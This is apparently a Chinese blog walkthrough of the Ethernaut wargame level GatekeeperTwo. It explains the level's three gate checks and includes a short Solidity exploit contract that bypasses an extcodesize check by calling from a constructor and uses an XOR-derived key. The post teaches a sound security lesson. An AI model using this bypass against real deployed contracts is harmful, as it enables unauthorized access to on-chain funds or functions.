ethernaut——GatekeeperTwo

文章介绍了如何利用内联汇编、encodePacked编码和uint64的最大值来攻破名为GatekeeperTwo的合约。攻击者通过创建特定合约,进行异或算法操作,成功调用enter方法并通过了修饰器的检查。关键点在于不应仅凭运行时字节码为空来判断账户类型,因为合约也可能无运行时字节码。
摘要由CSDN通过智能技术生成

第十四关:GatekeeperTwo

本关知识点:

1. 内联汇编
2. solidity的encodePacked编码方式
3. solidity的uint64最大值取值
4. 合约的创建时字节码和运行时字节码

1. 题目要求

这个守门人带来了一些新的挑战, 同样的需要注册为参赛者来完成这一关

2. 代码功能解读

请添加图片描述

3. 漏洞分析

成功调用enter方法
	创建一个合约来进行外部调用通过修饰器一
	通过创建一个空合约来通过修饰器二
	做异或^的算法完成修饰器三

4. 攻击方法

contract Exploit {

  constructor(address victim) {

    bytes8 result;

    result = bytes8(uint64(uint64(bytes8(keccak256(abi.encodePacked(address(this))))) ^ type(uint64).max));

    GatekeeperTwo two = GatekeeperTwo(victim);

    two.enter(result);

  }

}

5. 攻击调用图

部署攻击合约就可以完成攻击

请添加图片描述
请添加图片描述

6. 知识点分析

合约的运行时字节码为空并不代表这是一个用户账户,合约账户通过在构造器中执行代码也可以达到没有运行时字节码的效果,所以不要用运行时字节码为空来判断是否为用户账户

如果对大家有用,请点赞;如果喜欢,请订阅加点赞,会一直更新~

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值